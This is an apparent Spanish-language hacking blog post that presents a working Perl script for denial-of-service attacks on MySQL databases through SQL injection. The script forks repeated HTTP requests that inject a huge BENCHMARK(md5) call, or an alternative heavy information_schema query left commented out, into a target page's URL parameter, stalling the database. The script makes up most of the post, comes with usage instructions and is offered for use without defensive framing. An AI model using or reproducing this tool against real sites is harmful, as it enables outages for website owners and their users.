DoS por SQLi

Resulta que apartir de una inyeccion en SQL , se pueden hacer tantas cosas que es algo que en el area de hacking siempre estan saliendo nuevas tecnicas y nuevas tools. Hoy decidi hacer un POST un poco avanzado para aquellos que no tengan idea de SQLi. Lo que vamos hacer es hacer un DoS al motor de SQL que en este caso el script que escribi para que realize la accion es para atacar un MYSQL.
Lo que hacemos es atacar de forma parecida al que se realiza en Time-Based Blind SQL. Pero en este caso forzamos al motor a realizar un delay constantemente.
Aqui esta el script hecho en perl

1. · #!/usr/bin/perl
2. · use IO::Socket;
3. · if (!@ARGV[2]){
4. · print "======================================================= \n";
5. · print " Denial of Service MySQL injection V 1.0by MagnoBalt \n\n";
6. · print " use perl $0 www.pagina.com.ar /noticia.php?id=45\n\n";
7. · print "======================================================= \n";
8. · exit(0);
9. · }
10. ·
11. · $host=$ARGV[0];
12. · $path=$ARGV[1];
13. · #$injeccion="+and+(select+count(*)+from+information_schema.columns, +information_schema.columns+T1,

+information_schema.tables+T2)" ;

14. · $injeccion="+and benchmark(99999999999999,md5(0x6b616f78))";
15. · for($i = 1; $i < $ARGV[2] ; $i++) {
16. · $pid = fork();
17. · $socket = new IO::Socket::INET(
18. · PeerAddr => $host,
19. · PeerPort => 'http(80)',
20. · Proto => 'tcp') || die "[-] No se ha podido conectar a $host";
21. · print $socket "GET " .$path.$injeccion. " HTTP/1.0\r\n";
22. · print $socket "HOST:$host\r\n";
23. · print $socket "\n\n";
24. · print "*";
25. · }

nota: La linea 13 esta comentada, si quieren provocar el delay con la tecnica "Blind Heavy Query" descomentenla y comenten la linea 14 que es usando la funcion Benchmark.

Dejo el link de otro mismo script pero hecho en php por OzX . Link


Saludos.